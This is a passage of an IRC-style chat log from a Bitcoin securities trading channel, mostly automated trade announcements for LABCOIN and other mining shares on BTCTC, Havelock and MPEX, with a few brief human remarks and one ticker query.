2255 @ 0.0023 = 5.1865 BTC [-] Aug 20 04:21:34 [HAVELOCK] [XBOND] 2 @ 0.0010723 = 0.0021 BTC [+] Aug 20 04:22:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.03665 BTC [-] Aug 20 04:23:23 [BTCTC] [DMS.SELLING] 50 @ 0.01777 = 0.8885 BTC [+] Aug 20 04:24:45 [BTCTC] [LABCOIN] 20 @ 0.002301 = 0.046 BTC [+] Aug 20 04:24:47 [BTCTC] [LABCOIN] 245 @ 0.0023 = 0.5635 BTC [-] Aug 20 04:24:48 [BTCTC] [LABCOIN] 2000 @ 0.0023 = 4.6 BTC [-] Aug 20 04:24:48 [BTCTC] [LABCOIN] 2000 @ 0.0023 = 4.6 BTC [-] Aug 20 04:24:50 [BTCTC] [LABCOIN] 19 @ 0.0023 = 0.0437 BTC [-] Aug 20 04:24:51 [BTCTC] [LABCOIN] 312 @ 0.002261 = 0.7054 BTC [-] Aug 20 04:25:03 [MPEX] [S.MPOE] 592 @ 0.00084179 = 0.4983 BTC [+] Aug 20 04:25:05 [MPEX] [S.MPOE] 2408 @ 0.00083813 = 2.0182 BTC [-] Aug 20 04:27:39 [HAVELOCK] [VTX] 2 @ 0.61999 = 1.24 BTC [+] Aug 20 04:28:53 [HAVELOCK] [AM100] 1 @ 0.0362 BTC [+] Aug 20 04:29:20 [BTCTC] [LABCOIN] 312 @ 0.002261 = 0.7054 BTC [-] Aug 20 04:30:35 [BTCTC] [LABCOIN] 312 @ 0.002261 = 0.7054 BTC [-] Aug 20 04:30:36 [BTCTC] [LABCOIN] 2423 @ 0.00226 = 5.476 BTC [-] Aug 20 04:32:40 [BTCTC] [ACTIVEMINING] 6 @ 0.005336 = 0.032 BTC [+] Aug 20 04:32:41 [BTCTC] [ACTIVEMINING] 68 @ 0.005337 = 0.3629 BTC [+] Aug 20 04:32:42 [BTCTC] [ACTIVEMINING] 1 @ 0.005338 BTC [+] Aug 20 04:33:50 [BTCTC] [LABCOIN] 77 @ 0.00226 = 0.174 BTC [-] Aug 20 04:33:51 [BTCTC] [LABCOIN] 400 @ 0.002254 = 0.9016 BTC [-] Aug 20 04:33:53 [BTCTC] [LABCOIN] 1 @ 0.002253 BTC [-] Aug 20 04:37:46 i made some good coin off xbond Aug 20 04:37:58 so i wouldnt be suprised Aug 20 04:41:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.0361 = 0.0722 BTC [-] Aug 20 04:43:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03661 BTC [+] Aug 20 04:45:05 [BTCTC] [LABCOIN] 1999 @ 0.002253 = 4.5037 BTC [-] Aug 20 04:45:07 [BTCTC] [LABCOIN] 21 @ 0.002252 = 0.0473 BTC [-] Aug 20 04:45:57 [BTCTC] [LABCOIN] 25 @ 0.002252 = 0.0563 BTC [-] Aug 20 04:46:52 [BTCTC] [LABCOIN] 30 @ 0.002282 = 0.0685 BTC [+] Aug 20 04:47:49 [BTCTC] [LABCOIN] 19 @ 0.002282 = 0.0434 BTC [+] Aug 20 04:48:03 [BTCTC] [LABCOIN] 30 @ 0.002253 = 0.0676 BTC [-] Aug 20 04:48:05 [BTCTC] [LABCOIN] 954 @ 0.002252 = 2.1484 BTC [-] Aug 20 04:48:05 [BTCTC] [LABCOIN] 200 @ 0.002252 = 0.4504 BTC [-] Aug 20 04:48:06 [BTCTC] [LABCOIN] 6000 @ 0.002245 = 13.47 BTC [-] Aug 20 04:48:07 [BTCTC] [LABCOIN] 131 @ 0.002201 = 0.2883 BTC [-] Aug 20 04:48:09 [BTCTC] [LABCOIN] 50 @ 0.0022 = 0.11 BTC [-] Aug 20 04:48:10 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 20 04:48:11 [BTCTC] [LABCOIN] 1000 @ 0.0022 = 2.2 BTC [-] Aug 20 04:49:01 [BTCTC] [LABCOIN] 30 @ 0.002152 = 0.0646 BTC [-] Aug 20 04:49:02 [BTCTC] [LABCOIN] 125 @ 0.002151 = 0.2689 BTC [-] Aug 20 04:49:04 [BTCTC] [LABCOIN] 1000 @ 0.00215 = 2.15 BTC [-] Aug 20 04:49:05 [BTCTC] [LABCOIN] 4667 @ 0.002138 = 9.978 BTC [-] Aug 20 04:49:06 [BTCTC] [LABCOIN] 584 @ 0.002137 = 1.248 BTC [-] Aug 20 04:49:07 [BTCTC] [LABCOIN] 375 @ 0.002131 = 0.7991 BTC [-] Aug 20 04:49:07 [BTCTC] [LABCOIN] 3000 @ 0.00213 = 6.39 BTC [-] Aug 20 04:49:08 [BTCTC] [LABCOIN] 1875 @ 0.002123 = 3.9806 BTC [-] Aug 20 04:49:10 [BTCTC] [LABCOIN] 160 @ 0.002123 = 0.3397 BTC [-] Aug 20 04:49:11 [BTCTC] [LABCOIN] 14391 @ 0.002122 = 30.5377 BTC [-] Aug 20 04:50:46 [BTCTC] [DMS.MINING] 25 @ 0.003325 = 0.0831 BTC [+] Aug 20 04:52:30 [BTCTC] [LABCOIN] 609 @ 0.002122 = 1.2923 BTC [-] Aug 20 04:52:31 [BTCTC] [LABCOIN] 296 @ 0.002101 = 0.6219 BTC [-] Aug 20 04:52:33 [BTCTC] [LABCOIN] 1368 @ 0.0021 = 2.8728 BTC [-] Aug 20 04:52:34 [BTCTC] [LABCOIN] 1000 @ 0.0021 = 2.1 BTC [-] Aug 20 04:53:21 It just doesn't stop. Aug 20 04:53:30 [BTCTC] [LABCOIN] 30 @ 0.002097 = 0.0629 BTC [-] Aug 20 04:53:32 [BTCTC] [LABCOIN] 85 @ 0.002098 = 0.1783 BTC [+] Aug 20 04:53:32 [BTCTC] [LABCOIN] 38 @ 0.0021 = 0.0798 BTC [+] Aug 20 04:54:01 [HAVELOCK] [VTX] 21 @ 0.61999 = 13.0198 BTC [+] Aug 20 04:56:19 [BTCTC] [LABCOIN] 30 @ 0.002082 = 0.0625 BTC [-] Aug 20 04:56:20 [BTCTC] [LABCOIN] 18 @ 0.002083 = 0.0375 BTC [+] Aug 20 04:56:21 [BTCTC] [LABCOIN] 20 @ 0.002093 = 0.0419 BTC [+] Aug 20 04:56:22 [BTCTC] [LABCOIN] 65 @ 0.002095 = 0.1362 BTC [+] Aug 20 04:56:33 [BTCTC] [LABCOIN] 30 @ 0.002051 = 0.0615 BTC [-] Aug 20 04:56:34 [BTCTC] [LABCOIN] 144 @ 0.00205 = 0.2952 BTC [-] Aug 20 04:56:36 [BTCTC] [LABCOIN] 2000 @ 0.00205 = 4.1 BTC [-] Aug 20 04:56:45 [BTCTC] [LABCOIN] 30 @ 0.00205 = 0.0615 BTC [-] Aug 20 04:57:10 [BTCTC] [LABCOIN] 55 @ 0.002045 = 0.1125 BTC [-] Aug 20 04:57:11 [BTCTC] [LABCOIN] 186 @ 0.00205 = 0.3813 BTC [+] Aug 20 04:57:23 [BTCTC] [LABCOIN] 55 @ 0.00205 = 0.1128 BTC [+] Aug 20 04:58:03 [BTCTC] [LABCOIN] 10 @ 0.002031 = 0.0203 BTC [-] Aug 20 04:58:10 [MPEX] [S.MPOE] 9300 @ 0.00084194 = 7.83 BTC [+] Aug 20 04:58:17 [BTCTC] [LABCOIN] 25 @ 0.00205 = 0.0513 BTC [+] Aug 20 04:58:20 [BTCTC] [LABCOIN] 75 @ 0.002031 = 0.1523 BTC [-] Aug 20 04:58:22 [BTCTC] [LABCOIN] 5 @ 0.00203 = 0.0102 BTC [-] Aug 20 04:58:44 [BTCTC] [LABCOIN] 20 @ 0.00203 = 0.0406 BTC [-] Aug 20 04:59:33 [BTCTC] [LABCOIN] 30 @ 0.002048 = 0.0614 BTC [+] Aug 20 04:59:34 [BTCTC] [LABCOIN] 1 @ 0.002049 BTC [+] Aug 20 05:00:04 [BTCTC] [LABCOIN] 24 @ 0.002031 = 0.0487 BTC [-] Aug 20 05:00:19 [BTCTC] [LABCOIN] 7 @ 0.002021 = 0.0141 BTC [-] Aug 20 05:00:22 [BTCTC] [LABCOIN] 30 @ 0.002021 = 0.0606 BTC [-] Aug 20 05:00:24 [HAVELOCK] [AM100] 2 @ 0.0363 = 0.0726 BTC [+] Aug 20 05:00:43 [BTCTC] [LABCOIN] 518 @ 0.002021 = 1.0469 BTC [-] Aug 20 05:01:25 [BTCTC] [LABCOIN] 1 @ 0.00203 BTC [+] Aug 20 05:02:18 [BTCTC] [LABCOIN] 1 @ 0.00203 BTC [+] Aug 20 05:03:02 [BTCTC] [LABCOIN] 26 @ 0.002031 = 0.0528 BTC [+] Aug 20 05:03:03 [BTCTC] [LABCOIN] 161 @ 0.002099 = 0.3379 BTC [+] Aug 20 05:03:30 [BTCTC] [LABCOIN] 3000 @ 0.002024 = 6.072 BTC [-] Aug 20 05:03:32 [BTCTC] [LABCOIN] 1000 @ 0.002022 = 2.022 BTC [-] Aug 20 05:03:33 [BTCTC] [LABCOIN] 3000 @ 0.002022 = 6.066 BTC [-] Aug 20 05:03:33 [BTCTC] [LABCOIN] 50 @ 0.002011 = 0.1006 BTC [-] Aug 20 05:03:35 [BTCTC] [LABCOIN] 650 @ 0.002011 = 1.3072 BTC [-] Aug 20 05:03:36 [BTCTC] [LABCOIN] 50 @ 0.00201 = 0.1005 BTC [-] Aug 20 05:03:37 [BTCTC] [LABCOIN] 1000 @ 0.002009 = 2.009 BTC [-] Aug 20 05:03:38 [BTCTC] [LABCOIN] 1000 @ 0.002004 = 2.004 BTC [-] Aug 20 05:03:39 [BTCTC] [LABCOIN] 9000 @ 0.002003 = 18.027 BTC [-] Aug 20 05:03:41 [BTCTC] [LABCOIN] 30 @ 0.002003 = 0.0601 BTC [-] Aug 20 05:04:15 [BTCTC] [LABCOIN] 5000 @ 0.002003 = 10.015 BTC [-] Aug 20 05:04:53 [BTCTC] [LABCOIN] 3000 @ 0.002001 = 6.003 BTC [-] Aug 20 05:05:06 [BTCTC] [LABCOIN] 30 @ 0.002 = 0.06 BTC [-] Aug 20 05:05:07 [BTCTC] [LABCOIN] 85 @ 0.002001 = 0.1701 BTC [+] Aug 20 05:05:09 [BTCTC] [LABCOIN] 335 @ 0.002002 = 0.6707 BTC [+] Aug 20 05:05:22 [BTCTC] [LABCOIN] 30 @ 0.002001 = 0.06 BTC [-] Aug 20 05:05:24 [BTCTC] [LABCOIN] 115 @ 0.002002 = 0.2302 BTC [+] Aug 20 05:05:25 [BTCTC] [LABCOIN] 375 @ 0.002099 = 0.7871 BTC [+] Aug 20 05:05:26 [BTCTC] [LABCOIN] 2480 @ 0.0021 = 5.208 BTC [+] Aug 20 05:05:28 [BTCTC] [LABCOIN] 20 @ 0.002001 = 0.04 BTC [-] Aug 20 05:07:27 [BTCTC] [LABCOIN] 85 @ 0.002041 = 0.1735 BTC [+] Aug 20 05:07:28 [BTCTC] [LABCOIN] 30 @ 0.002042 = 0.0613 BTC [+] Aug 20 05:07:29 [BTCTC] [LABCOIN] 98 @ 0.002043 = 0.2002 BTC [+] Aug 20 05:07:30 [BTCTC] [LABCOIN] 365 @ 0.002071 = 0.7559 BTC [+] Aug 20 05:07:31 [BTCTC] [LABCOIN] 4 @ 0.002096 = 0.0084 BTC [+] Aug 20 05:07:33 [BTCTC] [LABCOIN] 32 @ 0.002099 = 0.0672 BTC [+] Aug 20 05:07:33 [BTCTC] [LABCOIN] 520 @ 0.0021 = 1.092 BTC [+] Aug 20 05:07:34 [BTCTC] [LABCOIN] 4667 @ 0.002163 = 10.0947 BTC [+] Aug 20 05:07:35 [BTCTC] [LABCOIN] 583 @ 0.002164 = 1.2616 BTC [+] Aug 20 05:07:36 [BTCTC] [LABCOIN] 27 @ 0.002174 = 0.0587 BTC [+] Aug 20 05:08:54 [BTCTC] [LABCOIN] 60 @ 0.002021 = 0.1213 BTC [-] Aug 20 05:08:56 [BTCTC] [LABCOIN] 30 @ 0.002171 = 0.0651 BTC [+] Aug 20 05:08:57 [BTCTC] [LABCOIN] 3 @ 0.002172 = 0.0065 BTC [+] Aug 20 05:11:07 [BTCTC] [LABCOIN] 30 @ 0.00205 = 0.0615 BTC [-] Aug 20 05:11:09 [BTCTC] [LABCOIN] 320 @ 0.002051 = 0.6563 BTC [+] Aug 20 05:11:10 [BTCTC] [LABCOIN] 110 @ 0.002095 = 0.2305 BTC [+] Aug 20 05:11:43 [BTCTC] [LABCOIN] 80 @ 0.002029 = 0.1623 BTC [-] Aug 20 05:11:45 [BTCTC] [LABCOIN] 20 @ 0.002049 = 0.041 BTC [+] Aug 20 05:11:47 [BTCTC] [LABCOIN] 1000 @ 0.002174 = 2.174 BTC [+] Aug 20 05:11:48 [BTCTC] [LABCOIN] 167 @ 0.002175 = 0.3632 BTC [+] Aug 20 05:12:08 [BTCTC] [LABCOIN] 85 @ 0.002024 = 0.172 BTC [-] Aug 20 05:12:10 [BTCTC] [LABCOIN] 30 @ 0.002024 = 0.0607 BTC [-] Aug 20 05:12:11 [BTCTC] [LABCOIN] 2000 @ 0.002023 = 4.046 BTC [-] Aug 20 05:12:13 [BTCTC] [LABCOIN] 20 @ 0.002021 = 0.0404 BTC [-] Aug 20 05:12:14 [BTCTC] [LABCOIN] 865 @ 0.002021 = 1.7482 BTC [-] Aug 20 05:12:38 [BTCTC] [LABCOIN] 30 @ 0.002072 = 0.0622 BTC [+] Aug 20 05:12:55 [BTCTC] [LABCOIN] 15 @ 0.002071 = 0.0311 BTC [-] Aug 20 05:12:57 [BTCTC] [LABCOIN] 70 @ 0.002072 = 0.145 BTC [+] Aug 20 05:14:06 [BTCTC] [LABCOIN] 119 @ 0.002045 = 0.2434 BTC [-] Aug 20 05:14:07 [BTCTC] [LABCOIN] 15 @ 0.002068 = 0.031 BTC [+] Aug 20 05:14:08 [BTCTC] [LABCOIN] 6 @ 0.002069 = 0.0124 BTC [+] Aug 20 05:14:09 [BTCTC] [LABCOIN] 35 @ 0.002073 = 0.0726 BTC [+] Aug 20 05:14:24 [BTCTC] [LABCOIN] 30 @ 0.002036 = 0.0611 BTC [-] Aug 20 05:14:25 [BTCTC] [LABCOIN] 85 @ 0.002035 = 0.173 BTC [-] Aug 20 05:14:27 [BTCTC] [LABCOIN] 2000 @ 0.00203 = 4.06 BTC [-] Aug 20 05:14:28 [BTCTC] [LABCOIN] 2000 @ 0.00203 = 4.06 BTC [-] Aug 20 05:14:29 [BTCTC] [LABCOIN] 2568 @ 0.00202 = 5.1874 BTC [-] Aug 20 05:16:13 [MPEX] [S.MPOE] 2493 @ 0.00084194 = 2.099 BTC [+] Aug 20 05:16:28 [BTCTC] [LABCOIN] 1000 @ 0.002022 = 2.022 BTC [+] Aug 20 05:16:30 [BTCTC] [LABCOIN] 1000 @ 0.002022 = 2.022 BTC [+] Aug 20 05:16:31 [BTCTC] [LABCOIN] 1432 @ 0.00202 = 2.8926 BTC [-] Aug 20 05:17:14 [BTCTC] [LABCOIN] 30 @ 0.002033 = 0.061 BTC [+] Aug 20 05:17:15 [BTCTC] [LABCOIN] 85 @ 0.002033 = 0.1728 BTC [+] Aug 20 05:17:17 [BTCTC] [LABCOIN] 12 @ 0.002034 = 0.0244 BTC [+] Aug 20 05:17:18 [BTCTC] [LABCOIN] 180 @ 0.002035 = 0.3663 BTC [+] Aug 20 05:17:21 [HAVELOCK] [VTX] 1 @ 0.61 BTC [-] Aug 20 05:21:01 [BTCTC] [LABCOIN] 6 @ 0.001982 = 0.0119 BTC [-] Aug 20 05:21:23 [BTCTC] [LABCOIN] 3 @ 0.001984 = 0.006 BTC [+] Aug 20 05:21:25 [BTCTC] [LABCOIN] 80 @ 0.001985 = 0.1588 BTC [+] Aug 20 05:21:42 [BTCTC] [LABCOIN] 70 @ 0.001985 = 0.139 BTC [+] Aug 20 05:21:52 [BTCTC] [LABCOIN] 300 @ 0.001985 = 0.5955 BTC [+] Aug 20 05:22:56 [HAVELOCK] [XBOND] 5 @ 0.00119798 = 0.006 BTC [+] Aug 20 05:23:06 [BTCTC] [LABCOIN] 37 @ 0.001989 = 0.0736 BTC [+] Aug 20 05:23:08 [BTCTC] [LABCOIN] 900 @ 0.00199 = 1.791 BTC [+] Aug 20 05:23:36 [HAVELOCK] [XBOND] 4 @ 0.00119799 = 0.0048 BTC [+] Aug 20 05:23:38 [BTCTC] [BTC-GROWTH] 19 @ 0.0957 = 1.8183 BTC [-] Aug 20 05:23:39 [BTCTC] [BTC-GROWTH] 116 @ 0.0955 = 11.078 BTC [-] Aug 20 05:25:46 [BTCTC] [LABCOIN] 60 @ 0.002008 = 0.1205 BTC [+] Aug 20 05:25:47 [BTCTC] [LABCOIN] 3 @ 0.002009 = 0.006 BTC [+] Aug 20 05:25:49 [BTCTC] [LABCOIN] 95 @ 0.00201 = 0.191 BTC [+] Aug 20 05:25:50 [BTCTC] [LABCOIN] 4 @ 0.002034 = 0.0081 BTC [+] Aug 20 05:25:51 [BTCTC] [LABCOIN] 115 @ 0.002035 = 0.234 BTC [+] Aug 20 05:25:51 [BTCTC] [LABCOIN] 120 @ 0.002072 = 0.2486 BTC [+] Aug 20 05:25:52 [BTCTC] [LABCOIN] 962 @ 0.002073 = 1.9942 BTC [+] Aug 20 05:25:53 [BTCTC] [LABCOIN] 10 @ 0.002094 = 0.0209 BTC [+] Aug 20 05:25:54 [BTCTC] [LABCOIN] 80 @ 0.002095 = 0.1676 BTC [+] Aug 20 05:26:16 [BTCTC] [ACTIVEMINING] 30 @ 0.005247 = 0.1574 BTC [-] Aug 20 05:26:18 [BTCTC] [ACTIVEMINING] 68 @ 0.005246 = 0.3567 BTC [-] Aug 20 05:26:19 [BTCTC] [ACTIVEMINING] 12 @ 0.005238 = 0.0629 BTC [-] Aug 20 05:26:29 [HAVELOCK] [XBOND] 1 @ 0.00119799 BTC [+] Aug 20 05:28:42 [BTCTC] [LABCOIN] 3 @ 0.002072 = 0.0062 BTC [-] Aug 20 05:28:43 [BTCTC] [LABCOIN] 84 @ 0.002073 = 0.1741 BTC [+] Aug 20 05:32:14 [BTCTC] [LABCOIN] 2 @ 0.002034 = 0.0041 BTC [-] Aug 20 05:32:15 [BTCTC] [LABCOIN] 61 @ 0.002035 = 0.1241 BTC [+] Aug 20 05:33:40 [BTCTC] [LABCOIN] 34 @ 0.002049 = 0.0697 BTC [+] Aug 20 05:33:42 [BTCTC] [LABCOIN] 20 @ 0.002072 = 0.0414 BTC [+] Aug 20 05:33:43 [BTCTC] [LABCOIN] 3 @ 0.002073 = 0.0062 BTC [+] Aug 20 05:33:44 [BTCTC] [LABCOIN] 3 @ 0.002104 = 0.0063 BTC [+] Aug 20 05:33:45 [BTCTC] [LABCOIN] 16 @ 0.002105 = 0.0337 BTC [+] Aug 20 05:35:50 [BTCTC] [LABCOIN] 85 @ 0.002079 = 0.1767 BTC [-] Aug 20 05:35:51 [BTCTC] [LABCOIN] 2 @ 0.002104 = 0.0042 BTC [+] Aug 20 05:35:52 [BTCTC] [LABCOIN] 20 @ 0.002104 = 0.0421 BTC [+] Aug 20 05:35:54 [BTCTC] [LABCOIN] 34 @ 0.002105 = 0.0716 BTC [+] Aug 20 05:35:55 [BTCTC] [LABCOIN] 81 @ 0.002174 = 0.1761 BTC [+] Aug 20 05:36:35 [BTCTC] [LABCOIN] 166 @ 0.002174 = 0.3609 BTC [+] Aug 20 05:36:35 [BTCTC] [LABCOIN] 1000 @ 0.002175 = 2.175 BTC [+] Aug 20 05:36:36 [BTCTC] [LABCOIN] 2000 @ 0.002175 = 4.35 BTC [+] Aug 20 05:36:38 [BTCTC] [LABCOIN] 159 @ 0.002175 = 0.3458 BTC [+] Aug 20 05:40:01 [BTCTC] [LABCOIN] 15 @ 0.002051 = 0.0308 BTC [-] Aug 20 05:41:11 [BTCTC] [LABCOIN] 20 @ 0.002028 = 0.0406 BTC [-] Aug 20 05:41:13 [BTCTC] [LABCOIN] 200 @ 0.00202 = 0.404 BTC [-] Aug 20 05:46:51 [HAVELOCK] [AM100] 12 @ 0.036 = 0.432 BTC [-] Aug 20 05:47:00 [HAVELOCK] [XBOND] 8 @ 0.00119799 = 0.0096 BTC [+] Aug 20 05:47:22 [BTCTC] [LABCOIN] 6 @ 0.002021 = 0.0121 BTC [+] Aug 20 05:47:29 [MPEX] [S.MPOE] 1877 @ 0.00083813 = 1.5732 BTC [-] Aug 20 05:47:31 [MPEX] [S.MPOE] 7276 @ 0.0008375 = 6.0937 BTC [-] Aug 20 05:47:47 [BTCTC] [LABCOIN] 50 @ 0.002022 = 0.1011 BTC [+] Aug 20 05:48:19 [BTCTC] [LABCOIN] 1 @ 0.002021 BTC [-] Aug 20 05:50:27 [BTCTC] [LABCOIN] 1 @ 0.002021 BTC [-] Aug 20 05:50:28 [BTCTC] [LABCOIN] 406 @ 0.002021 = 0.8205 BTC [-] Aug 20 05:51:18 [BTCTC] [LABCOIN] 594 @ 0.002021 = 1.2005 BTC [-] Aug 20 05:51:19 [BTCTC] [LABCOIN] 10 @ 0.002022 = 0.0202 BTC [+] Aug 20 05:53:54 [BTCTC] [LABCOIN] 4 @ 0.002024 = 0.0081 BTC [+] Aug 20 05:54:13 [BTCTC] [LABCOIN] 35 @ 0.002025 = 0.0709 BTC [+] Aug 20 05:54:45 [BTCTC] [LABCOIN] 5 @ 0.002029 = 0.0101 BTC [+] Aug 20 05:55:32 [BTCTC] [LABCOIN] 8 @ 0.00203 = 0.0162 BTC [+] Aug 20 05:55:33 [BTCTC] [LABCOIN] 2 @ 0.002043 = 0.0041 BTC [+] Aug 20 05:57:04 [BTCTC] [LABCOIN] 8 @ 0.002043 = 0.0163 BTC [+] Aug 20 05:57:06 [BTCTC] [LABCOIN] 22 @ 0.002068 = 0.0455 BTC [+] Aug 20 05:57:07 [BTCTC] [LABCOIN] 8 @ 0.002094 = 0.0168 BTC [+] Aug 20 05:57:08 [BTCTC] [LABCOIN] 27 @ 0.002095 = 0.0566 BTC [+] Aug 20 05:58:16 [BTCTC] [HOSTED-MINING] 1 @ 0.279 BTC [-] Aug 20 06:09:28 [BTCTC] [LABCOIN] 1 @ 0.002025 BTC [-] Aug 20 06:09:48 [BTCTC] [LABCOIN] 5 @ 0.002037 = 0.0102 BTC [+] Aug 20 06:09:50 [BTCTC] [LABCOIN] 20 @ 0.002063 = 0.0413 BTC [+] Aug 20 06:09:50 [BTCTC] [LABCOIN] 4 @ 0.002094 = 0.0084 BTC [+] Aug 20 06:09:51 [BTCTC] [LABCOIN] 38 @ 0.002095 = 0.0796 BTC [+] Aug 20 06:10:15 !ticker btctc dms.selling Aug 20 06:10:17 [BTCT:DMS.SELLING] 1D: 0.01735 / 0.0177 / 0.01782 (345 shares, 6.1 BTC), 7D: 0.0165 / 0.01936 / 0.02528 (40553 shares, 784.9 BTC), 30D: 0.0165 / 0.02131 / 0.02646 (93926 shares, 2001.5 BTC) Aug 20 06:10:26 [BTCTC] [LABCOIN] 23 @ 0.002102 = 0.0483 BTC [+] Aug 20 06:10:27 [BTCTC] [LABCOIN] 30 @ 0.002101 = 0.063 BTC [-] Aug 20 06:10:29 [BTCTC] [LABCOIN] 85 @ 0.002101 = 0.1786 BTC [-] Aug 20 06:10:30 [BTCTC] [LABCOIN] 73 @ 0.0021 = 0.1533 BTC [-] Aug 20 06:10:31 [BTCTC] [LABCOIN] 249 @ 0.002026 = 0.5045 BTC [-] Aug 20 06:10:32 [BTCTC] [LABCOIN] 1999 @ 0.002025 = 4.048 BTC [-] Aug 20 06:10:33 [BTCTC] [LABCOIN] 11 @ 0.002024 = 0.0223 BTC [-] Aug 20 06:10:33 [BTCTC] [LABCOIN] 6 @ 0.002023 = 0.0121 BTC [-] Aug 20 06:10:35 [BTCTC] [LABCOIN] 85 @ 0.002022 = 0.1719 BTC [-] Aug 20 06:10:36 [BTCTC] [LABCOIN] 712 @ 0.002022 = 1.4397 BTC [-] Aug 20 06:10:37 [BTCTC] [LABCOIN] 3900 @ 0.002021 = 7.8819 BTC [-] Aug 20 06:10:38 [BTCTC] [LABCOIN] 1800 @ 0.00202 = 3.636 BTC [-] Aug 20 06:10:39 [BTCTC] [LABCOIN] 12 @ 0.002014 = 0.0242 BTC [-] Aug 20 06:10:40 [BTCTC] [LABCOIN] 100 @ 0.002013 = 0.2013 BTC [-] Aug 20 06:10:41 [BTCTC] [LABCOIN] 318 @ 0.002012 = 0.6398 BTC [-] Aug 20 06:10:42 [BTCTC] [LABCOIN] 50 @ 0.002011 = 0.1006 BTC [-] Aug 20 06:10:43 [BTCTC] [LABCOIN] 1000 @ 0.002011 = 2.011 BTC [-] Aug 20 06:10:44 [BTCTC] [LABCOIN] 1000 @ 0.00201 = 2.01 BTC [-] Aug 20 06:10:45 [BTCTC] [LABCOIN] 495 @ 0.00201 = 0.995 BTC [-] Aug 20 06:10:46 [BTCTC] [LABCOIN] 152 @ 0.002002 = 0.3043 BTC [-] Aug 20 06:14:03 [MPEX] [S.MPOE] 5776 @ 0.0008375 = 4.8374 BTC [-] Aug 20 06:14:05 [MPEX] [S.MPOE] 965 @ 0.00083711 = 0.8078 BTC [-] Aug 20 06:14:09 [MPEX] [S.MPOE] 4248 @ 0.00083395 = 3.5426 BTC [-] Aug 20 06:15:43 [HAVELOCK] [AM100] 1 @ 0.0372 BTC [+] Aug 20 06:16:30 [BTCTC] [LABCOIN] 30 @ 0.002036 = 0.0611 BTC [+] Aug 20 06:17:37 [BTCTC] [LABCOIN] 20 @ 0.002037 = 0.0407 BTC [+] Aug 20 06:19:06 [BTCTC] [LABCOIN] 2097 @ 0.002001 = 4.1961 BTC [-] Aug 20 06:19:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005196 = 0.1559 BTC [-] Aug 20 06:19:20 [BTCTC] [ACTIVEMINING] 3000 @ 0.005195 = 15.585 BTC [-] Aug 20 06:19:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005264 = 0.1579 BTC [+] Aug 20 06:19:22 [BTCTC] [ACTIVEMINING] 6 @ 0.005265 = 0.0316 BTC [+] Aug 20 06:19:41 [BTCTC] [ACTIVEMINING] 339 @ 0.005266 = 1.7852 BTC [+] Aug 20 06:20:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.03665 = 0.2932 BTC [+] Aug 20 06:22:03 [HAVELOCK] [XBOND] 1 @ 0.001198 BTC [+] Aug 20 06:22:16 [BTCTC] [LABCOIN] 3000 @ 0.002001 = 6.003 BTC [-] Aug 20 06:22:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.03666 BTC [+] Aug 20 06:24:50 [BTCTC] [ACTIVEMINING] 10 @ 0.005184 = 0.0518 BTC [-] Aug 20 06:26:42 [BTCTC] [LABCOIN] 5 @ 0.002003 = 0.01 BTC [+] Aug 20 06:26:53 [BTCTC] [LABCOIN] 2 @ 0.002006 = 0.004 BTC [+] Aug 20 06:26:54 [BTCTC] [NASTY-PT] 3 @ 0.003697 = 0.0111 BTC [-] Aug 20 06:26:55 [BTCTC] [LABCOIN] 18 @ 0.002007 = 0.0361 BTC [+] Aug 20 06:26:57 [BTCTC] [LABCOIN] 1 @ 0.002011 BTC [+] Aug 20 06:26:57 [BTCTC] [LABCOIN] 13 @ 0.002012 = 0.0262 BTC [+] Aug 20 06:26:58 [BTCTC] [LABCOIN] 2 @ 0.00202 = 0.004 BTC [+] Aug 20 06:26:59 [BTCTC] [LABCOIN] 20 @ 0.002021 = 0.0404 BTC [+] Aug 20 06:27:00 [BTCTC] [LABCOIN] 1 @ 0.002044 BTC [+] Aug 20 06:27:01 [BTCTC] [LABCOIN] 11 @ 0.002045 = 0.0225 BTC [+] Aug 20 06:27:02 [BTCTC] [LABCOIN] 5 @ 0.002061 = 0.0103 BTC [+] Aug 20 06:27:04 [BTCTC] [LABCOIN] 1 @ 0.002094 BTC [+] Aug 20 06:27:05 [BTCTC] [LABCOIN] 10 @ 0.002095 = 0.021 BTC [+] Aug 20 06:27:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.03666 = 0.0733 BTC [+] Aug 20 06:32:03 [BTCTC] [LABCOIN] 30 @ 0.00208 = 0.0624 BTC [-] Aug 20 06:32:05 [BTCTC] [LABCOIN] 85 @ 0.002081 = 0.1769 BTC [+] Aug 20 06:32:06 [BTCTC] [LABCOIN] 7 @ 0.002086 = 0.0146 BTC [+] Aug 20 06:32:06 [BTCTC] [LABCOIN] 2 @ 0.002154 = 0.0043 BTC [+] Aug 20 06:33:01 [BTCTC] [LABCOIN] 30 @ 0.002026 = 0.0608 BTC [-] Aug 20 06:33:02 [BTCTC] [LABCOIN] 85 @ 0.002025 = 0.1721 BTC [-] Aug 20 06:33:04 [BTCTC] [LABCOIN] 14 @ 0.002023 = 0.0283 BTC [-] Aug 20 06:33:05 [BTCTC] [LABCOIN] 871 @ 0.002023 = 1.762 BTC [-] Aug 20 06:34:37 http://govtslaves.info/farmers-to-face-fines-or-prison-sentences-for-selling-food-directly-to-customers/ Aug 20 06:36:07 [BTCTC] [LABCOIN] 1 @ 0.002144 BTC [+] Aug 20 06:37:34 [BTCTC] [LABCOIN] 30 @ 0.002089 = 0.0627 BTC [-] Aug 20 06:37:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005166 = 0.155 BTC [-] Aug 20 06:38:21 [BTCTC] [ACTIVEMINING] 30 @ 0.005166 = 0.155 BTC [-] Aug 20 06:38:45 [BTCTC] [ACTIVEMINING] 30 @ 0.005166 = 0.155 BTC [-] Aug 20 06:38:46 [BTCTC] [ACTIVEMINING] 183 @ 0.005165 = 0.9452 BTC [-] Aug 20 06:39:45 [BTCTC] [BASIC-MINING] 2 @ 0.2897 = 0.5794 BTC [+] Aug 20 06:40:15 [BTCTC] [BASIC-MINING] 1 @ 0.2897 BTC [+] Aug 20 06:40:45 [BTCTC] [BASIC-MINING] 1 @ 0.2898 BTC [+] Aug 20 06:43:07 [BTCTC] [LABCOIN] 5 @ 0.002082 = 